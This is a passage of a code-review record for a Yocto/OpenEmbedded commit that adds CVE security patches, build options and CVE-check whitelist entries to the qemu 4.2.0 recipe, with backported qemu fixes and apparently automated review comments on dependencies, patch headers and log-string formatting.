+PACKAGECONFIG ??= "fdt alsa kvm slirp"
# Handle distros such as CentOS 5 32-bit that do not have kvm support
PACKAGECONFIG_remove = "${@'kvm' if not os.path.exists('/usr/include/linux/kvm.h') else ''}"
diff --git a/meta/recipes-devtools/qemu/qemu.inc b/meta/recipes-devtools/qemu/qemu.inc
index 067179fdeb..59ff69d51d 100644
--- a/meta/recipes-devtools/qemu/qemu.inc
+++ b/meta/recipes-devtools/qemu/qemu.inc
@@ -28,35 +28,154 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \
file://0009-Fix-webkitgtk-builds.patch \
file://0010-configure-Add-pkg-config-handling-for-libgcrypt.patch \
file://0011-hw-i386-pc-fix-regression-in-parsing-vga-cmdline-par.patch \
+ file://0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch \
file://CVE-2019-15890.patch \
file://CVE-2020-1711.patch \
file://CVE-2020-7039-1.patch \
file://CVE-2020-7039-2.patch \
file://CVE-2020-7039-3.patch \
file://0001-Add-enable-disable-udev.patch \
- file://CVE-2020-7211.patch \
- file://0001-qemu-Do-not-include-file-if-not-exists.patch \
+ file://CVE-2020-7211.patch \
+ file://0001-qemu-Do-not-include-file-if-not-exists.patch \
file://CVE-2020-11102.patch \
- file://CVE-2020-11869.patch \
- file://CVE-2020-13361.patch \
- file://CVE-2020-10761.patch \
- file://CVE-2020-10702.patch \
- file://CVE-2020-13659.patch \
- file://CVE-2020-13800.patch \
- file://CVE-2020-13362.patch \
- file://CVE-2020-15863.patch \
- file://CVE-2020-14364.patch \
- file://CVE-2020-14415.patch \
- file://CVE-2020-16092.patch \
- file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \
- file://CVE-2019-20175.patch \
- file://CVE-2020-24352.patch \
- "
+ file://CVE-2020-11869.patch \
+ file://CVE-2020-13361.patch \
+ file://CVE-2020-10761.patch \
+ file://CVE-2020-10702.patch \
+ file://CVE-2020-13659.patch \
+ file://CVE-2020-13800.patch \
+ file://CVE-2020-13362.patch \
+ file://CVE-2020-15863.patch \
+ file://CVE-2020-14364.patch \
+ file://CVE-2020-14415.patch \
+ file://CVE-2020-16092.patch \
+ file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \
+ file://CVE-2019-20175.patch \
+ file://CVE-2020-24352.patch \
+ file://CVE-2020-25723.patch \
+ file://CVE-2021-20203.patch \
+ file://CVE-2021-3392.patch \
+ file://CVE-2020-25085.patch \
+ file://CVE-2020-25624_1.patch \
+ file://CVE-2020-25624_2.patch \
+ file://CVE-2020-25625.patch \
+ file://CVE-2020-29443.patch \
+ file://CVE-2021-20221.patch \
+ file://CVE-2021-20181.patch \
+ file://CVE-2021-3416_1.patch \
+ file://CVE-2021-3416_2.patch \
+ file://CVE-2021-3416_3.patch \
+ file://CVE-2021-3416_5.patch \
+ file://CVE-2021-3416_6.patch \
+ file://CVE-2021-3416_7.patch \
+ file://CVE-2021-3416_8.patch \
+ file://CVE-2021-3416_9.patch \
+ file://CVE-2021-3416_10.patch \
+ file://CVE-2021-20257.patch \
+ file://CVE-2021-3544.patch \
+ file://CVE-2021-3544_2.patch \
+ file://CVE-2021-3544_3.patch \
+ file://CVE-2021-3544_4.patch \
+ file://CVE-2021-3544_5.patch \
+ file://CVE-2021-3545.patch \
+ file://CVE-2021-3546.patch \
+ file://CVE-2021-3527-1.patch \
+ file://CVE-2021-3527-2.patch \
+ file://CVE-2021-3582.patch \
+ file://CVE-2021-3607.patch \
+ file://CVE-2021-3608.patch \
+ file://CVE-2020-12829_1.patch \
+ file://CVE-2020-12829_2.patch \
+ file://CVE-2020-12829_3.patch \
+ file://CVE-2020-12829_4.patch \
+ file://CVE-2020-12829_5.patch \
+ file://CVE-2020-27617.patch \
+ file://CVE-2020-28916.patch \
+ file://CVE-2021-3682.patch \
+ file://CVE-2020-13253_1.patch \
+ file://CVE-2020-13253_2.patch \
+ file://CVE-2020-13253_3.patch \
+ file://CVE-2020-13253_4.patch \
+ file://CVE-2020-13253_5.patch \
+ file://CVE-2020-13791.patch \
+ file://CVE-2022-35414.patch \
+ file://CVE-2020-27821.patch \
+ file://CVE-2020-13754-1.patch \
+ file://CVE-2020-13754-2.patch \
+ file://CVE-2020-13754-3.patch \
+ file://CVE-2020-13754-4.patch \
+ file://CVE-2021-3713.patch \
+ file://CVE-2021-3748.patch \
+ file://CVE-2021-3930.patch \
+ file://CVE-2021-4206.patch \
+ file://CVE-2021-4207.patch \
+ file://CVE-2022-0216-1.patch \
+ file://CVE-2022-0216-2.patch \
+ file://CVE-2021-3750.patch \
+ file://CVE-2021-3638.patch \
+ file://CVE-2021-20196.patch \
+ file://CVE-2021-3507.patch \
+ file://hw-block-nvme-refactor-nvme_addr_read.patch \
+ file://hw-block-nvme-handle-dma-errors.patch \
+ file://CVE-2021-3929.patch \
+ file://CVE-2022-4144.patch \
+ file://CVE-2020-15859.patch \
+ file://CVE-2020-15469-1.patch \
+ file://CVE-2020-15469-2.patch \
+ file://CVE-2020-15469-3.patch \
+ file://CVE-2020-15469-4.patch \
+ file://CVE-2020-15469-5.patch \
+ file://CVE-2020-15469-6.patch \
+ file://CVE-2020-15469-7.patch \
+ file://CVE-2020-15469-8.patch \
+ file://CVE-2020-35504.patch \
+ file://CVE-2020-35505.patch \
+ file://CVE-2022-26354.patch \
+ file://CVE-2021-3409-1.patch \
+ file://CVE-2021-3409-2.patch \
+ file://CVE-2021-3409-3.patch \
+ file://CVE-2021-3409-4.patch \
+ file://CVE-2021-3409-5.patch \
+ file://hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch \
+ file://CVE-2023-0330.patch \
+ file://CVE-2023-3354.patch \
+ file://CVE-2023-3180.patch \
+ file://CVE-2020-24165.patch \
+ file://CVE-2023-5088.patch \
+ file://9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch \
+ file://CVE-2023-2861.patch \
+ "
UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar"
SRC_URI[md5sum] = "278eeb294e4b497e79af7a57e660cb9a"
SRC_URI[sha256sum] = "d3481d4108ce211a053ef15be69af1bdd9dde1510fda80d92be0f6c3e98768f0"
+# Applies against virglrender < 0.6.0 and not qemu itself
+CVE_CHECK_WHITELIST += "CVE-2017-5957"
+
+# The VNC server can expose host files uder some circumstances. We don't
+# enable it by default.
+CVE_CHECK_WHITELIST += "CVE-2007-0998"
+
+# 'The issues identified by this CVE were determined to not constitute a vulnerability.'
+# https://bugzilla.redhat.com/show_bug.cgi?id=1609015#c11
+CVE_CHECK_WHITELIST += "CVE-2018-18438"
+
+# the issue introduced in v5.1.0-rc0
+CVE_CHECK_WHITELIST += "CVE-2020-27661"
+
+# As per https://nvd.nist.gov/vuln/detail/CVE-2023-0664
+# https://bugzilla.redhat.com/show_bug.cgi?id=2167423
+# this bug related to windows specific.
+CVE_CHECK_WHITELIST += "CVE-2023-0664"
+
+# As per https://bugzilla.redhat.com/show_bug.cgi?id=2203387
+# RHEL specific issue
+CVE_CHECK_WHITELIST += "CVE-2023-2680"
+
+# Affected only `qemu-kvm` shipped with Red Hat Enterprise Linux 8.3 release.
+CVE_CHECK_WHITELIST += "CVE-2021-20295"
+
COMPATIBLE_HOST_mipsarchn32 = "null"
COMPATIBLE_HOST_mipsarchn64 = "null"
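Review bot: The whitelist entry for CVE-2007-0998 is justified by `We don't enable it by default`, but `CVE_CHECK_WHITELIST` applies to every build of the recipe, including ones where VNC is turned on. The comment should say so, e.g. `# Whitelisted for the default configuration only; re-evaluate if VNC is enabled`, or the entry should be made conditional on the configuration. Separately, the CVE-2021-3416 series in `SRC_URI` goes from `_3` to `_5`; if `_4` was left out on purpose (presumably not applicable to 4.2.0), a one-line comment next to the list would record that.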
@@ -195,6 +314,16 @@ PACKAGECONFIG[glusterfs] = "--enable-glusterfs,--disable-glusterfs"
PACKAGECONFIG[xkbcommon] = "--enable-xkbcommon,--disable-xkbcommon,libxkbcommon"
PACKAGECONFIG[libudev] = "--enable-libudev,--disable-libudev,eudev"
PACKAGECONFIG[libxml2] = "--enable-libxml2,--disable-libxml2,libxml2"
+PACKAGECONFIG[seccomp] = "--enable-seccomp,--disable-seccomp,libseccomp"
+PACKAGECONFIG[capstone] = "--enable-capstone,--disable-capstone"
+# libnfs is currently provided by meta-kodi
+PACKAGECONFIG[libnfs] = "--enable-libnfs,--disable-libnfs,libnfs"
+PACKAGECONFIG[brlapi] = "--enable-brlapi,--disable-brlapi"
+PACKAGECONFIG[vde] = "--enable-vde,--disable-vde"
+# version 4.2.0 doesn't have an "internal" option for enable-slirp, so use "git" which uses the same configure code path
+PACKAGECONFIG[slirp] = "--enable-slirp=git,--disable-slirp"
+PACKAGECONFIG[rbd] = "--enable-rbd,--disable-rbd"
+PACKAGECONFIG[rdma] = "--enable-rdma,--disable-rdma"
INSANE_SKIP_${PN} = "arch"
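Review bot: Several of the new `PACKAGECONFIG` flags (`capstone`, `brlapi`, `vde`, `rbd`, `rdma`) have no dependency field, so enabling one adds the configure switch without any build dependency; configure then either fails or, in a native build, may pick the library up from the host. Only `libnfs` has a comment saying where its dependency comes from; the others deserve the same, or a dependency where a recipe exists. For `slirp`, `--enable-slirp=git` presumably selects the copy bundled in the qemu source tree, so slirp fixes have to keep arriving as patches in this recipe. That is worth stating in the comment, because the same commit turns `slirp` on by default in qemu-system-native.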
diff --git a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
index 3a7d7bbd33..3789f1edea 100644
--- a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
+++ b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
@@ -60,7 +60,7 @@ Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
-index 6f132c5f..8329950c 100644
+index 300c9765..2823db7d 100644
--- a/fsdev/virtfs-proxy-helper.c
+++ b/fsdev/virtfs-proxy-helper.c
@@ -13,7 +13,6 @@
@@ -71,9 +71,9 @@ index 6f132c5f..8329950c 100644
#include <sys/fsuid.h>
#include <sys/vfs.h>
#include <sys/ioctl.h>
-@@ -27,7 +26,11 @@
- #include "9p-iov-marshal.h"
+@@ -28,7 +27,11 @@
#include "hw/9pfs/9p-proxy.h"
+ #include "hw/9pfs/9p-util.h"
#include "fsdev/9p-iov-marshal.h"
-
+/*
@@ -84,3 +84,6 @@ index 6f132c5f..8329950c 100644
#define PROGNAME "virtfs-proxy-helper"
#ifndef XFS_SUPER_MAGIC
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch b/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch
new file mode 100644
index 0000000000..741a4fce0e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch
@@ -0,0 +1,48 @@
+From 00b5032eaddb7193f03f0a28b10286244d2e2a7b Mon Sep 17 00:00:00 2001
+From: Carlos Santos <casantos@redhat.com>
+Date: Thu, 17 Oct 2019 09:37:13 -0300
+Subject: [PATCH 1/1] util/cacheinfo: fix crash when compiling with uClibc
+
+uClibc defines _SC_LEVEL1_ICACHE_LINESIZE and _SC_LEVEL1_DCACHE_LINESIZE
+but the corresponding sysconf calls returns -1, which is a valid result,
+meaning that the limit is indeterminate.
+
+Handle this situation using the fallback values instead of crashing due
+to an assertion failure.
+
+Signed-off-by: Carlos Santos <casantos@redhat.com>
+Message-Id: <20191017123713.30192-1-casantos@redhat.com>
+Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
+
+Upstream-status: Backport
+Signed-off-by: Andrei Gherzan <andrei.gherzan@huawei.com>
+---
+ util/cacheinfo.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/util/cacheinfo.c b/util/cacheinfo.c
+index ea6f3e99bf..d94dc6adc8 100644
+--- a/util/cacheinfo.c
++++ b/util/cacheinfo.c
+@@ -93,10 +93,16 @@ static void sys_cache_info(int *isize, int *dsize)
+ static void sys_cache_info(int *isize, int *dsize)
+ {
+ # ifdef _SC_LEVEL1_ICACHE_LINESIZE
+- *isize = sysconf(_SC_LEVEL1_ICACHE_LINESIZE);
++ int tmp_isize = (int) sysconf(_SC_LEVEL1_ICACHE_LINESIZE);
++ if (tmp_isize > 0) {
++ *isize = tmp_isize;
++ }
+ # endif
+ # ifdef _SC_LEVEL1_DCACHE_LINESIZE
+- *dsize = sysconf(_SC_LEVEL1_DCACHE_LINESIZE);
++ int tmp_dsize = (int) sysconf(_SC_LEVEL1_DCACHE_LINESIZE);
++ if (tmp_dsize > 0) {
++ *dsize = tmp_dsize;
++ }
+ # endif
+ }
+ #endif /* sys_cache_info */
+--
+2.30.1
+
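Review bot: The trailer `Upstream-status: Backport` is spelled differently from the `Upstream-Status:` tag used by the other patches in this commit and carries no commit reference, so tooling that matches the tag exactly may miss it and a reader cannot locate the upstream change. Suggest `Upstream-Status: Backport [<upstream commit URL>]`. On the code, the new side leaves `*isize` and `*dsize` untouched when sysconf() returns a non-positive value, which relies on the caller having initialised them; the caller is outside the hunk, so that is worth checking against the 4.2.0 tree.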
diff --git a/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
new file mode 100644
index 0000000000..72d9c47bde
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
@@ -0,0 +1,63 @@
+From a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b Mon Sep 17 00:00:00 2001
+From: Omar Sandoval <osandov@fb.com>
+Date: Thu, 14 May 2020 08:06:43 +0200
+Subject: [PATCH] 9pfs: local: ignore O_NOATIME if we don't have permissions
+
+QEMU's local 9pfs server passes through O_NOATIME from the client. If
+the QEMU process doesn't have permissions to use O_NOATIME (namely, it
+does not own the file nor have the CAP_FOWNER capability), the open will
+fail. This causes issues when from the client's point of view, it
+believes it has permissions to use O_NOATIME (e.g., a process running as
+root in the virtual machine). Additionally, overlayfs on Linux opens
+files on the lower layer using O_NOATIME, so in this case a 9pfs mount
+can't be used as a lower layer for overlayfs (cf.
+https://github.com/osandov/drgn/blob/dabfe1971951701da13863dbe6d8a1d172ad9650/vmtest/onoatimehack.c
+and https://github.com/NixOS/nixpkgs/issues/54509).
+
+Luckily, O_NOATIME is effectively a hint, and is often ignored by, e.g.,
+network filesystems. open(2) notes that O_NOATIME "may not be effective
+on all filesystems. One example is NFS, where the server maintains the
+access time." This means that we can honor it when possible but fall
+back to ignoring it.
+
+Acked-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Signed-off-by: Omar Sandoval <osandov@fb.com>
+Message-Id: <e9bee604e8df528584693a4ec474ded6295ce8ad.1587149256.git.osandov@fb.com>
+Signed-off-by: Greg Kurz <groug@kaod.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b]
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/9pfs/9p-util.h | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
+index 79ed6b233e5..546f46dc7dc 100644
+--- a/hw/9pfs/9p-util.h
++++ b/hw/9pfs/9p-util.h
+@@ -37,9 +37,22 @@ static inline int openat_file(int dirfd, const char *name, int flags,
+ {
+ int fd, serrno, ret;
+
++again:
+ fd = openat(dirfd, name, flags | O_NOFOLLOW | O_NOCTTY | O_NONBLOCK,
+ mode);
+ if (fd == -1) {
++ if (errno == EPERM && (flags & O_NOATIME)) {
++ /*
++ * The client passed O_NOATIME but we lack permissions to honor it.
++ * Rather than failing the open, fall back without O_NOATIME. This
++ * doesn't break the semantics on the client side, as the Linux
++ * open(2) man page notes that O_NOATIME "may not be effective on
++ * all filesystems". In particular, NFS and other network
++ * filesystems ignore it entirely.
++ */
++ flags &= ~O_NOATIME;
++ goto again;
++ }
+ return -1;
+ }
+
+--
+GitLab
+
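Review bot: The patch header does not say why this functional change is carried on a stable branch: it has no `CVE:` tag, and only its position directly before `CVE-2023-2861.patch` in `SRC_URI` suggests it is a prerequisite for that fix. If so, a header line such as `Comment: prerequisite for CVE-2023-2861.patch` would record it and keep the two from being dropped separately. In `openat_file`, a short comment at the `again:` label noting that the retry happens at most once, because `O_NOATIME` is cleared before the jump, would help the next reader; the function continues outside the hunk.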
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
new file mode 100644
index 0000000000..6fee4f640d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
@@ -0,0 +1,164 @@
+From e29da77e5fddf6480e3a0e80b63d703edaec751b Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH] sm501: Convert printf + abort to qemu_log_mask
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Some places already use qemu_log_mask() to log unimplemented features
+or errors but some others have printf() then abort(). Convert these to
+qemu_log_mask() and avoid aborting to prevent guests to easily cause
+denial of service.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: 305af87f59d81e92f2aaff09eb8a3603b8baa322.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 57 ++++++++++++++++++++++------------------------
+ 1 file changed, 27 insertions(+), 30 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index acc692531a..bd3ccfe311 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -727,8 +727,8 @@ static void sm501_2d_operation(SM501State *s)
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+ if (addressing != 0x0) {
+- printf("%s: only XY addressing is supported.\n", __func__);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
++ return;
+ }
+
+ if (rop_mode == 0) {
+@@ -754,8 +754,8 @@ static void sm501_2d_operation(SM501State *s)
+
+ if ((s->twoD_source_base & 0x08000000) ||
+ (s->twoD_destination_base & 0x08000000)) {
+- printf("%s: only local memory is supported.\n", __func__);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
++ return;
+ }
+
+ switch (operation) {
+@@ -823,9 +823,9 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+
+ default:
+- printf("non-implemented SM501 2D operation. %d\n", operation);
+- abort();
+- break;
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
++ operation);
++ return;
+ }
+
+ if (dst_base >= get_fb_addr(s, crt) &&
+@@ -892,9 +892,8 @@ static uint64_t sm501_system_config_read(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 system config : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
++ "register read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -948,15 +947,15 @@ static void sm501_system_config_write(void *opaque, hwaddr addr,
+ break;
+ case SM501_ENDIAN_CONTROL:
+ if (value & 0x00000001) {
+- printf("sm501 system config : big endian mode not implemented.\n");
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: system config big endian mode not"
++ " implemented.\n");
+ }
+ break;
+
+ default:
+- printf("sm501 system config : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (uint32_t)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
++ "register write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1207,9 +1206,8 @@ static uint64_t sm501_disp_ctrl_read(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 disp ctrl : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -1345,9 +1343,9 @@ static void sm501_disp_ctrl_write(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 disp ctrl : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (unsigned)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1433,9 +1431,8 @@ static uint64_t sm501_2d_engine_read(void *opaque, hwaddr addr,
+ ret = 0; /* Should return interrupt status */
+ break;
+ default:
+- printf("sm501 disp ctrl : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -1520,9 +1517,9 @@ static void sm501_2d_engine_write(void *opaque, hwaddr addr,
+ /* ignored, writing 0 should clear interrupt status */
+ break;
+ default:
+- printf("sm501 2d engine : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (unsigned)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2d engine register "
++ "write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1670,9 +1667,9 @@ static void sm501_update_display(void *opaque)
+ draw_line = draw_line32_funcs[dst_depth_index];
+ break;
+ default:
+- printf("sm501 update display : invalid control register value.\n");
+- abort();
+- break;
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: update display"
++ "invalid control register value.\n");
++ return;
+ }
+
+ /* set up to draw hardware cursor */
+--
+2.25.1
+
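Review bot: Three of the new log strings lose a space where the literals are joined: `"sm501: not implemented system config" "register read. ..."` and the matching write message print `configregister`, and `"sm501: update display" "invalid control register value.\n"` prints `displayinvalid`. A trailing space on the first literal of each pair fixes it, e.g. `"sm501: not implemented system config "`; since this is a verbatim backport, that would be a local deviation to note in the header. Also, with abort() removed the read handlers now reach `return ret;` for an unknown register, so `ret` must be initialised where it is declared. Those declarations are outside the inner hunks and should be checked in the 4.2.0 source.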
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
new file mode 100644
index 0000000000..e7258a43d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
@@ -0,0 +1,139 @@
+From 6f8183b5dc5b309378687830a25e85ea8fb860ea Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 2/5] sm501: Shorten long variable names in sm501_2d_operation
+
+This increases readability and cleans up some confusing naming.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Message-id: b9b67b94c46e945252a73c77dfd117132c63c4fb.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 45 ++++++++++++++++++++++-----------------------
+ 1 file changed, 22 insertions(+), 23 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index bd3ccfe311..f42d05e1e4 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -700,17 +700,16 @@ static inline void hwc_invalidate(SM501State *s, int crt)
+ static void sm501_2d_operation(SM501State *s)
+ {
+ /* obtain operation parameters */
+- int operation = (s->twoD_control >> 16) & 0x1f;
++ int cmd = (s->twoD_control >> 16) & 0x1F;
+ int rtl = s->twoD_control & 0x8000000;
+ int src_x = (s->twoD_source >> 16) & 0x01FFF;
+ int src_y = s->twoD_source & 0xFFFF;
+ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+ int dst_y = s->twoD_destination & 0xFFFF;
+- int operation_width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int operation_height = s->twoD_dimension & 0xFFFF;
++ int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ int height = s->twoD_dimension & 0xFFFF;
+ uint32_t color = s->twoD_foreground;
+- int format_flags = (s->twoD_stretch >> 20) & 0x3;
+- int addressing = (s->twoD_stretch >> 16) & 0xF;
++ int format = (s->twoD_stretch >> 20) & 0x3;
+ int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+@@ -721,12 +720,12 @@ static void sm501_2d_operation(SM501State *s)
+ /* get frame buffer info */
+ uint8_t *src = s->local_mem + src_base;
+ uint8_t *dst = s->local_mem + dst_base;
+- int src_width = s->twoD_pitch & 0x1FFF;
+- int dst_width = (s->twoD_pitch >> 16) & 0x1FFF;
++ int src_pitch = s->twoD_pitch & 0x1FFF;
++ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+- if (addressing != 0x0) {
++ if ((s->twoD_stretch >> 16) & 0xF) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
+ return;
+ }
+@@ -758,20 +757,20 @@ static void sm501_2d_operation(SM501State *s)
+ return;
+ }
+
+- switch (operation) {
++ switch (cmd) {
+ case 0x00: /* copy area */
+ #define COPY_AREA(_bpp, _pixel_type, rtl) { \
+ int y, x, index_d, index_s; \
+- for (y = 0; y < operation_height; y++) { \
+- for (x = 0; x < operation_width; x++) { \
++ for (y = 0; y < height; y++) { \
++ for (x = 0; x < width; x++) { \
+ _pixel_type val; \
+ \
+ if (rtl) { \
+- index_s = ((src_y - y) * src_width + src_x - x) * _bpp; \
+- index_d = ((dst_y - y) * dst_width + dst_x - x) * _bpp; \
++ index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \
++ index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \
+ } else { \
+- index_s = ((src_y + y) * src_width + src_x + x) * _bpp; \
+- index_d = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \
++ index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \
++ index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+ } \
+ if (rop_mode == 1 && rop == 5) { \
+ /* Invert dest */ \
+@@ -783,7 +782,7 @@ static void sm501_2d_operation(SM501State *s)
+ } \
+ } \
+ }
+- switch (format_flags) {
++ switch (format) {
+ case 0:
+ COPY_AREA(1, uint8_t, rtl);
+ break;
+@@ -799,15 +798,15 @@ static void sm501_2d_operation(SM501State *s)
+ case 0x01: /* fill rectangle */
+ #define FILL_RECT(_bpp, _pixel_type) { \
+ int y, x; \
+- for (y = 0; y < operation_height; y++) { \
+- for (x = 0; x < operation_width; x++) { \
+- int index = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \
++ for (y = 0; y < height; y++) { \
++ for (x = 0; x < width; x++) { \
++ int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+ *(_pixel_type *)&dst[index] = (_pixel_type)color; \
+ } \
+ } \
+ }
+
+- switch (format_flags) {
++ switch (format) {
+ case 0:
+ FILL_RECT(1, uint8_t);
+ break;
+@@ -824,14 +823,14 @@ static void sm501_2d_operation(SM501State *s)
+
+ default:
+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
+- operation);
++ cmd);
+ return;
+ }
+
+ if (dst_base >= get_fb_addr(s, crt) &&
+ dst_base <= get_fb_addr(s, crt) + fb_len) {
+- int dst_len = MIN(fb_len, ((dst_y + operation_height - 1) * dst_width +
+- dst_x + operation_width) * (1 << format_flags));
++ int dst_len = MIN(fb_len, ((dst_y + height - 1) * dst_pitch +
++ dst_x + width) * (1 << format));
+ if (dst_len) {
+ memory_region_set_dirty(&s->local_mem_region, dst_base, dst_len);
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
new file mode 100644
index 0000000000..c647028cfe
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
@@ -0,0 +1,47 @@
+From 2824809b7f8f03ddc6e2b7e33e78c06022424298 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
